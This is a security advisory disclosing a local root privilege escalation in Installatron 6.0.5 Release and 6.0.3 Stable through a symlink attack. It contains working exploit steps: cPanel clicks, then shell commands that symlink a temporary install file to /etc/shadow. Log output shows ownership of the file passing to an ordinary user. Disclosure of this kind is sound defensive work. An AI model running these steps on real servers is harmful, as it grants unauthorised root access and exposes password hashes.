Installatron 6.0.5 Release and 6.0.3 Stable - local users could escalate privileges to root



DESCRIPTION


Installatron handled user controllable data as root, allowing for a symlink attack, and ultimately privilege escalation to root.



IMPACT


Local users with access to Installatron could obtain root privileges via the following steps:

01. Log into cPanel
02. Click the "Installatron Applications Installer" link
03. Click the "WordPress" link
04. Click the "install this application" link
05. Click "Next" (Introduction)
06. Click "Next" (Location)
07. Click "Next" (Version)
08. Click "I Accept" (License)
09. Click "Next" (Database)
10. Click "Next" (Settings)
11. Click "Submit" (Confirmation)

12.

[user@host ~]$ cd .installatron/current
[user@host ~/.installatron/current]$ mv 377ovO 377ovO.old
[user@host ~/.installatron/current]$ ln -s /etc/shadow 377ovO
13. Click "Complete"


This is what /etc/shadow looked like before:

-r-------- 1 root root 1181 Jul  2 12:40 /etc/shadow

and this is what it looked like afterwards:

-rw------- 1 user user 1216 Jul  2 12:50 /etc/shadow


This bug was found through simple observation of the Installatron logs in /var/installatron/logs. When the "Complete" button is clicked from step #13 above, the following is logged to the /var/installatron/logs/filesystem_log file:

09:43:45-04:00 SUCCESS chown(/home/user/.installatron/current/3EqlBV) - code: core_chown($path,911);core_chgrp($path,908);
09:43:45-04:00 SUCCESS chmod(/home/user/.installatron/current/3EqlBV) - code: core_chmod($path,384);
09:43:45-04:00 SUCCESS chown(/home/user/.installatron/current/3EqlBV) - code: core_chown($path,911);core_chgrp($path,908);
09:43:45-04:00 SUCCESS chmod(/home/user/.installatron/current/3EqlBV) - code: core_chmod($path,384);